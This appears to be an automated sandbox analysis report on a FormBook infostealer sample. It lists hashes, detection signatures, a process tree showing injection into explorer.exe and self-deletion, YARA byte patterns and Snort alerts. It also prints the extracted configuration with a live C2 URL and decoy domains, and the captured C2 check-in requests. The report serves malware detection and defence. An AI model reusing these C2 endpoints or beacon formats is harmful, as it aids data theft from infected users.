Loading ...

Play interactive tourEdit tour

Analysis Report 350969bc_by_Libranalysis

Overview

General Information

Sample Name:350969bc_by_Libranalysis (renamed file extension from none to exe)
Analysis ID:412308
MD5:350969bc82ec33af12acf100c41eb4d1
SHA1:f17d5fc8bad55cc2b523173b43585e9edb9154e4
SHA256:961ac1d96eb469d4a949c18c25de7bf7d3ad79a502794b470a3505fa8b65d023
Tags:Formbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 350969bc_by_Libranalysis.exe (PID: 6988 cmdline: 'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe' MD5: 350969BC82EC33AF12ACF100C41EB4D1)
    • 350969bc_by_Libranalysis.exe (PID: 3416 cmdline: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe MD5: 350969BC82EC33AF12ACF100C41EB4D1)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6576 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6260 cmdline: /c del 'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.sabaidiving.com/i6rd/"], "decoy": ["blissfulbeeboutique.online", "syazanisuhaimi.com", "designaliveeuk.com", "andradeasfora.com", "barnesandn.com", "onlinecasinocrazy.com", "cornerstonemedwa.com", "fijiherald.com", "experienciaswagon.com", "cityofhouston.info", "thebenefitssherpa.com", "honeyew.com", "sliceinvestors.com", "socialeconomic.net", "ballisticjet.com", "fortuneland.fund", "globaleranking.com", "gracestationchurch.com", "mixigo.net", "ximibabes.com", "morooka.club", "kittycarehotel.com", "solartenacres.com", "bunies3.com", "celery.store", "grayboxus.com", "haopianba.com", "021rencai.net", "cortinasenrollablesloscabos.com", "qiaosouwenku.com", "856379607.xyz", "urgentdocservices.com", "countrywideeconomy.com", "onemoresysadmin.com", "salemerket.com", "susiebennett.com", "comedyforyou.com", "satssar.com", "woo.education", "shellgang.com", "wattaccounting.com", "mandapeoplesyatem.com", "cavaliertrimmershop.com", "netfx-service.com", "s138s9.com", "smoothome.com", "cabinhealthy.com", "sexyvenushuegel.net", "jsvending.info", "gej2holdings.com", "arcticluxuryvillas.com", "shinsotoknives.com", "mardigrasdecorators.com", "ainongshucai.com", "ricdevan.com", "boringcode.net", "thebotanicaltype.com", "jewelonsale.com", "sunstatepipelines.com", "jasontaylor.online", "clipsquote.com", "toypoodlebreedershome.com", "thearcadelounge.com", "unico-m.online"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 15 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166b9:$sqlite3step: 68 34 1C 7B E1
        • 0x167cc:$sqlite3step: 68 34 1C 7B E1
        • 0x166e8:$sqlite3text: 68 38 2A 90 C5
        • 0x1680d:$sqlite3text: 68 38 2A 90 C5
        • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
        5.2.350969bc_by_Libranalysis.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.350969bc_by_Libranalysis.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.sabaidiving.com/i6rd/"], "decoy": ["blissfulbeeboutique.online", "syazanisuhaimi.com", "designaliveeuk.com", "andradeasfora.com", "barnesandn.com", "onlinecasinocrazy.com", "cornerstonemedwa.com", "fijiherald.com", "experienciaswagon.com", "cityofhouston.info", "thebenefitssherpa.com", "honeyew.com", "sliceinvestors.com", "socialeconomic.net", "ballisticjet.com", "fortuneland.fund", "globaleranking.com", "gracestationchurch.com", "mixigo.net", "ximibabes.com", "morooka.club", "kittycarehotel.com", "solartenacres.com", "bunies3.com", "celery.store", "grayboxus.com", "haopianba.com", "021rencai.net", "cortinasenrollablesloscabos.com", "qiaosouwenku.com", "856379607.xyz", "urgentdocservices.com", "countrywideeconomy.com", "onemoresysadmin.com", "salemerket.com", "susiebennett.com", "comedyforyou.com", "satssar.com", "woo.education", "shellgang.com", "wattaccounting.com", "mandapeoplesyatem.com", "cavaliertrimmershop.com", "netfx-service.com", "s138s9.com", "smoothome.com", "cabinhealthy.com", "sexyvenushuegel.net", "jsvending.info", "gej2holdings.com", "arcticluxuryvillas.com", "shinsotoknives.com", "mardigrasdecorators.com", "ainongshucai.com", "ricdevan.com", "boringcode.net", "thebotanicaltype.com", "jewelonsale.com", "sunstatepipelines.com", "jasontaylor.online", "clipsquote.com", "toypoodlebreedershome.com", "thearcadelounge.com", "unico-m.online"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 350969bc_by_Libranalysis.exeReversingLabs: Detection: 36%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 350969bc_by_Libranalysis.exeJoe Sandbox ML: detected
          Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 350969bc_by_Libranalysis.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 350969bc_by_Libranalysis.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000002.927845340.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716595208.000000000150F000.00000040.00000001.sdmp, control.exe, 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716167439.000000000114A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: 350969bc_by_Libranalysis.exe, control.exe
          Source: Binary string: control.pdbUGP source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716167439.000000000114A000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000002.927845340.0000000005A00000.00000002.00000001.sdmp

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49752 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49752 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49752 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 103.15.186.68:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 103.15.186.68:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 103.15.186.68:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 192.64.147.164:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 192.64.147.164:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 192.64.147.164:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.sabaidiving.com/i6rd/
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=LPK2IT8klZq3HV5LkVv0HrUERmrfkAigbODxoDO8ybIsb03GvAFTkZSuj3fGszWvHktP&9rJ=N8YdlZih HTTP/1.1Host: www.thebenefitssherpa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=erkeaSWQY+Clkg2r/Pi/REnUuZTidSmaWK+TmjN6ZRgeJAvAzvFr0iNL5kMJBQzOKWdi&9rJ=N8YdlZih HTTP/1.1Host: www.onlinecasinocrazy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=smN73hIgGm+8k6TIdjzBFwruzJIggaSM7b/fO07bhI8vXH2xBAb/Cwk8Hoq4ZaNv9SU/&9rJ=N8YdlZih HTTP/1.1Host: www.blissfulbeeboutique.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=OPhbRlTkoXrsQ0r3dKw1IvWRRcBcb3Q4dmj86tcXQUJSZPkW56a8j7HjPVLeeIGxTFMj&9rJ=N8YdlZih HTTP/1.1Host: www.cityofhouston.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=ghT/ntM+diyN3YW/4q0tO05CJd4dCe68Gx0VtJcOz7kJ2fBcIsU6AMgtishNfwDLzL+S&9rJ=N8YdlZih HTTP/1.1Host: www.socialeconomic.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=87tzyM19Su4M9sklYGX+FxwUh158b1qmSh9f/APlSoINpVQ2gCQ5Erv1vAVp92mNDUWx&9rJ=N8YdlZih HTTP/1.1Host: www.toypoodlebreedershome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=lFTIMkQ5ik6igxl0SADoA/l4wqgGqwWePHw2ryfpEDmwfQ+0wMbe0XdxLJthRM6xta9b&9rJ=N8YdlZih HTTP/1.1Host: www.ricdevan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=/0C7Nd/5ZhwBGDRTMer0ywO01wFnuraj4upl6M1zLF0nwnsKqCnReLNuI6TuwxtThkOZ&9rJ=N8YdlZih HTTP/1.1Host: www.ximibabes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=kbJM45GZrQKbh6aR4KV/wVFZMmwDJvkUUs1obqo0rCdmSsWUtmFh0yx89FvYawyrRJzX&9rJ=N8YdlZih HTTP/1.1Host: www.sabaidiving.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=wbIaUdvQqzQbHKzWrifpae4yz+HPBnPf3VQSw8NlhdhOO9H/uFvMKdwnlncPTgk9QTjs&9rJ=N8YdlZih HTTP/1.1Host: www.onemoresysadmin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=HOLe4E5VAs/9VGl0AghSjQ5UDYBgOj/qhjKLxJJROTaYJ7IE9VG9ZYc05xBD+gnk3HpC&9rJ=N8YdlZih HTTP/1.1Host: www.countrywideeconomy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: VOODOO1US VOODOO1US
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=LPK2IT8klZq3HV5LkVv0HrUERmrfkAigbODxoDO8ybIsb03GvAFTkZSuj3fGszWvHktP&9rJ=N8YdlZih HTTP/1.1Host: www.thebenefitssherpa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=erkeaSWQY+Clkg2r/Pi/REnUuZTidSmaWK+TmjN6ZRgeJAvAzvFr0iNL5kMJBQzOKWdi&9rJ=N8YdlZih HTTP/1.1Host: www.onlinecasinocrazy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=smN73hIgGm+8k6TIdjzBFwruzJIggaSM7b/fO07bhI8vXH2xBAb/Cwk8Hoq4ZaNv9SU/&9rJ=N8YdlZih HTTP/1.1Host: www.blissfulbeeboutique.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=OPhbRlTkoXrsQ0r3dKw1IvWRRcBcb3Q4dmj86tcXQUJSZPkW56a8j7HjPVLeeIGxTFMj&9rJ=N8YdlZih HTTP/1.1Host: www.cityofhouston.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=ghT/ntM+diyN3YW/4q0tO05CJd4dCe68Gx0VtJcOz7kJ2fBcIsU6AMgtishNfwDLzL+S&9rJ=N8YdlZih HTTP/1.1Host: www.socialeconomic.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=87tzyM19Su4M9sklYGX+FxwUh158b1qmSh9f/APlSoINpVQ2gCQ5Erv1vAVp92mNDUWx&9rJ=N8YdlZih HTTP/1.1Host: www.toypoodlebreedershome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=lFTIMkQ5ik6igxl0SADoA/l4wqgGqwWePHw2ryfpEDmwfQ+0wMbe0XdxLJthRM6xta9b&9rJ=N8YdlZih HTTP/1.1Host: www.ricdevan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=/0C7Nd/5ZhwBGDRTMer0ywO01wFnuraj4upl6M1zLF0nwnsKqCnReLNuI6TuwxtThkOZ&9rJ=N8YdlZih HTTP/1.1Host: www.ximibabes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=kbJM45GZrQKbh6aR4KV/wVFZMmwDJvkUUs1obqo0rCdmSsWUtmFh0yx89FvYawyrRJzX&9rJ=N8YdlZih HTTP/1.1Host: www.sabaidiving.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=wbIaUdvQqzQbHKzWrifpae4yz+HPBnPf3VQSw8NlhdhOO9H/uFvMKdwnlncPTgk9QTjs&9rJ=N8YdlZih HTTP/1.1Host: www.onemoresysadmin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=HOLe4E5VAs/9VGl0AghSjQ5UDYBgOj/qhjKLxJJROTaYJ7IE9VG9ZYc05xBD+gnk3HpC&9rJ=N8YdlZih HTTP/1.1Host: www.countrywideeconomy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.thebenefitssherpa.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0Date: Wed, 12 May 2021 13:48:08 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 387Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 63 69 74 79 6f 66 68 6f 75 73 74 6f 6e 2e 69 6e 66 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache Server at www.cityofhouston.info Port 80</address></body></html>
          Source: 350969bc_by_Libranalysis.exeString found in binary or memory: Http://google.com.br
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662905887.0000000003441000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000006.00000000.666349326.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: control.exe, 0000000A.00000002.918833437.0000000004DC2000.00000004.00000001.sdmpString found in binary or memory: http://www.countrywideeconomy.com
          Source: control.exe, 0000000A.00000002.918833437.0000000004DC2000.00000004.00000001.sdmpString found in binary or memory: http://www.countrywideeconomy.com/
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
